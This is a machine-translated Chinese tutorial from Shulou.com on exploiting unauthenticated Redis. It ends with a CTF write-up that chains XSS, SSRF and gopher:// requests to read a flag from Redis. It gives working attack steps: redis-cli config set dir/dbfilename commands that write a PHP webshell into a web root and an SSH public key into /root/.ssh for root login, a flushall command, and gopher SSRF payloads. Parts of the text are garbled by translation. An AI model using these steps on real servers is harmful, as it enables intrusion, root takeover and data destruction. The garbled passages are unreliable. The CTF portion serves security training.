Shulou(Shulou.com)06/01 Report--

This article mainly introduces the method of unauthorized access to redis for you in detail. It is easy to learn the detailed explanation of picture and text, and the effect of reading and understanding with the code is better. It is very suitable for beginners. Interested friends can refer to it.

Redis is a kind of non-relational database with key-value as key-value pair.

Redis is an open source log database written in ANSI C language, complies with BSD protocol, supports network, can be memory-based and persistent, Key-Value database, and provides API in multiple languages.

It is often called a data structure server because the value can be of types such as String, Map, list, sets, and sorted sets.

Installation service

Win

Download address: https://github.com/MSOpenTech/redis/releases

Test environment:

Operating system: win7

Ip:192.168.107.144

Command line input

Redis-server.exe redis.conf

Then check the port.

Port 6379 (redis default port) is already open

Redis started successfully

Ubuntu

Installation

Sudo apt-get updatesudo apt-get install redis-server

Start the service

Redis-server

Basic command

Connect redis

Redis-cli.exe-h 192.168.107.144

View the value with the key x

Redis 192.168.107.144 6379 > get x ""

Get all key

Redis 192.168.107.144 6379 > keys * 1) "x"

Delete all keys

Redis 192.168.107.144Viru 6379 > flushall exploit

This machine actively connects to the target machine through the telnet command.

Or connect through redis-cli.exe-h 192.168.107.144

Connected successfully

Enter info to get relevant information

You can see the redis version number and so on.

Utilization mode

Write a sentence webshell

Write ssh public key

Write to shell

/ / set the value of x redis 192.168.107.144redis 6379 > set x "" redis 192.168.107.144redis 6379 > config set dbfilename test.phpredis 192.168.107.144redis 6379 > config set dir D:/WWW/PHPTutorial/WWWredis 192.168.107.1446379 > save

Successfully written to the target machine

Write ssh public key

Generate a pair of keys locally

Root@ip-172-31-14-115:~/.ssh# ssh-keygen-t rsa

Then write the ssh public key to the target machine.

Root@ip-172-31-14-115:/etc/redis# redis-cli-h 192.168.107.144192.168.107.144config set dir / root/.ssh # set the local storage file directory 192.168.107.144config set dir 6379 > config set dbfilename pub_keys # set the local storage file name 192.168.107.144config set dir 6379 > set x "xxxx" # write your ssh public key to the x key. (xxxx is your own generated ssh public key) 192.168.107.144 save 6379 > save

Then connect to ssh locally

Root@ip-172-31-14-115:~/.ssh# ssh-I id_rsa root@192.168.107.144

Can

Redis in CTF (XSS- > SSRF&Gopher- > Redis)

The title is

Topic address: https://hackme.inndy.tw/scoreboard/

Xeeme

Leak

Discovery of leaked source code in robots.txt

It's encrypted config.php.

Xss hit cookie.

Interface after registration and login

There is verification in sending email.

Verify and write a script.

And then filtered something.

Testing with img

Onload also filtered it.

Notice a detail here, filter spaces plus onerror, guess that it will be filtered only when the onerror with spaces is matched, so construct onerror without spaces and try payload

Then hit cookie and successfully hit cookie.

Decode the SESSION

PHPSESSID=rmibdo13ohquscgsuphitr9cp4; FLAG_XSSME=FLAG {Sometimes, XSS can be critical vulnerability alert (1)}; FLAG_2=IN_THE_REDISxssrf leak

According to the cookie,FLAG_2=IN_THE_REDIS of the previous question

The same environment.

Because I got the administrator's cookie, log in.

If you need to log in locally, try to forge an XF header.

It's useless to change several ip heads.

So when you think of the questions you did before, you can directly type the source code of the administrator page.

I don't know why the xss platform can't receive it, so it's changed to another platform.

Using payload

Found that innerhtml was filtered

So html coding

Found that the request was received.

Solve the code and put it locally.

SSRF reads config.php

Guess that there is ssrf in send request function.

Vps received the request.

Decode:

... URL Send Request

Url parameters of post request

Try to read the file

Successfully read / etc/passwd

So read the config.php before.

Xssrf redis (ssrf+gopher takes flag)

According to the prompt of flag, the port of redis is 25566

Request redis to cooperate with gopher

Successfully obtained info

Check the keys.

Xmlhttp.send ("url=gopher://127.0.0.1:25566/_key%2520*")

To read it.

Since there is a flag key, read the value of the button directly.

Xmlhttp.send ("url=gopher://127.0.0.1:25566/_get%2520flag")

The type does not match.

So check the type.

Xmlhttp.send ("url=gopher://127.0.0.1:25566/_type%2520flag")

Is list, which returns the length of the list

Xmlhttp.send ("url=gopher://127.0.0.1:25566/_LLEN%2520flag")

So get all the elements

Xmlhttp.send ("url=gopher://127.0.0.1:25566/_LRANGE%2520flag%25200%252053")

So write a script.

Flag= ""} tiolpxeotysaesinoitacitnehtuatuohtiwsideR {GALF "result = flag [::-1] print (result)

Finally, flag FLAG {Redis without authentication is easy to exploit}

This is the end of the method of unauthorized access to redis. I hope the above content can be helpful to you and learn more knowledge. If you like this article, you might as well share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.